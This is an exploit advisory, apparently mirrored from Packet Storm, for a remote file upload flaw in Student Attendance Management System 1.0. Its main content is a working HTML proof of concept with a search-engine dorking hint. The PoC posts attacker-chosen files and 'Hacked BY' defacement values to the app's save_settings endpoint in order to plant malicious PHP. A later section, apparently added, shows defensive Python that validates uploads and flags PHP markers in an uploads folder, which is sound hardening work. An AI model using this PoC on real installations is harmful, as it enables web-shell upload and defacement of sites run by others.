## https://sploitus.com/exploit?id=PACKETSTORM:181295
=============================================================================================================================================  
| # Title : Student Attendance Management System 1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip |  
=============================================================================================================================================  
  
PoC:

[+] Dorking in Google or other search engines.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 84 sets the URL of the target.

[+] The path where the uploaded files are stored: http://127.0.0.1/student_attendance/assets/uploads/
  
[+] Save the code as html:

```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Manage Settings</title>
  <!-- Add your CSS links here -->
  <style>
    img#cimg {
      max-height: 10vh;
      max-width: 6vw;
    }
  </style>
</head>
<body>

<div class="card col-lg-12">
  <div class="card-body">
    <form action="" id="manage-settings">
      <div class="form-group">
        <label for="name" class="control-label">System Name</label>
        <input type="text" class="form-control" id="name" name="name" value="Hacked BY indoushka" required>
      </div>
      <div class="form-group">
        <label for="email" class="control-label">Email</label>
        <input type="email" class="form-control" id="email" name="email" value="indoushka4ever@gmail.com" required>
      </div>
      <div class="form-group">
        <label for="contact" class="control-label">Contact</label>
        <input type="text" class="form-control" id="contact" name="contact" value="+213771818860" required>
      </div>
      <div class="form-group">
        <label for="about" class="control-label">About Content</label>
        <textarea name="about" id="about" class="text-jqte" rows="5"><p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p></textarea>
      </div>
      <div class="form-group">
        <label for="" class="control-label">Image</label>
        <input type="file" class="form-control" name="img" id="img" onchange="displayImg(this)">
      </div>
      <div class="form-group">
        <img src="assets/uploads/1603344720_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg" alt="" id="cimg">
      </div>
      <center>
        <button type="submit" class="btn btn-info btn-primary btn-block col-md-2">Save</button>
      </center>
    </form>
  </div>
</div>

<script>
function displayImg(input) {
  if (input.files && input.files[0]) {
    var reader = new FileReader();
    reader.onload = function (e) {
      document.getElementById('cimg').src = e.target.result;
    }
    reader.readAsDataURL(input.files[0]);
  }
}

function start_load() {
  // Implement your loading functionality here
  console.log("Loading started...");
}

function end_load() {
  // Implement your end loading functionality here
  console.log("Loading ended...");
}

function alert_toast(message, type) {
  // Implement your alert/toast notification here
  console.log(`${type}: ${message}`);
}

document.getElementById('manage-settings').addEventListener('submit', function(e) {
  e.preventDefault(); // Prevent the default form submission

  start_load(); // Start loading

  var form = e.target;
  var formData = new FormData(form);

  fetch('http://127.0.0.1/student_attendance/ajax.php?action=save_settings', {
    method: 'POST',
    body: formData
  })
  .then(response => response.text())
  .then(resp => {
    if (resp == 1) {
      alert_toast('Data successfully saved.', 'success');
      setTimeout(function() {
        location.reload(); // Reload the page after saving
      }, 1000);
    } else {
      // Handle error case if needed
      console.log('Error:', resp);
    }
    end_load(); // End loading
  })
  .catch(error => {
    console.error('Error:', error);
    end_load(); // End loading
  });
});
</script>

</body>
</html>
```
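The weakness the PoC relies on is that `ajax.php?action=save_settings` writes whatever arrives in the `img` field into `assets/uploads/` and keeps the client-supplied name. The following Python is an added example, not code from the advisory or from the Student Attendance Management System: it shows the validation a fixed upload handler needs (allowlisted single extension, magic bytes matching that extension, no embedded PHP or HTML markers, server-chosen random filename) and reuses the same check to audit an existing uploads directory for files that should never have landed there. The `ALLOWED_EXTENSIONS` set, the `MAGIC` table, the `CODE_MARKERS` tuple and every entry in `SAMPLE_UPLOADS` are assumptions constructed for this example.

```python
"""Upload validation and uploads-directory audit (added example, not the
application's own code). All constants and sample files below are constructed
assumptions for illustration."""
import os
import secrets

# Assumption: the settings page only ever needs a logo image.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes a genuine file of each type must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Byte sequences that mark server-side code or markup hidden inside an "image".
CODE_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename, data):
    """Return (True, ext) for an acceptable image, otherwise (False, reason).

    Checks in order: no directory components or NUL bytes in the name, a
    non-empty stem with exactly one allowlisted extension, magic bytes that
    match that extension, and no code marker anywhere in the content.
    """
    base = os.path.basename(filename)
    if not base or base != filename or "\x00" in filename:
        return False, "path or NUL byte in filename"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "missing or multiple extensions"
    ext = parts[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in CODE_MARKERS):
        return False, "embedded code marker"
    return True, ext


def storage_name(ext):
    """Random, server-chosen name for the stored file; the client never
    influences it, so a name like shell.php cannot reach the disk."""
    return f"{secrets.token_hex(16)}.{ext}"


def audit_uploads(entries):
    """Run validate_upload over (filename, bytes) pairs as read from
    assets/uploads/ and return (filename, reason) for every rejected file."""
    findings = []
    for name, data in entries:
        ok, why = validate_upload(name, data)
        if not ok:
            findings.append((name, why))
    return findings


# Constructed sample directory listing: one legitimate banner and four files
# that a fixed handler must reject (and an audit must flag).
SAMPLE_UPLOADS = [
    ("1603344720_banner.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("shell.php", b"<?php echo 'placeholder'; ?>"),           # wrong type
    ("logo.php.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),      # double extension
    ("pic.png", b"GIF89a" + b"\x00" * 8),                      # magic mismatch
    ("photo.jpg", b"\xff\xd8\xff\xdb" + b"<?php" + b"x" * 8),  # code behind a valid header
]


if __name__ == "__main__":
    for name, reason in audit_uploads(SAMPLE_UPLOADS):
        print(f"REJECT {name}: {reason}")
    print("stored as:", storage_name("png"))
```

The directory audit is the check to run once on an instance that exposed the vulnerable endpoint: anything it reports under `assets/uploads/` is either a broken image or a file that the fixed handler would never have written, and the random `storage_name` is what the handler should use in place of the original filename.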
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================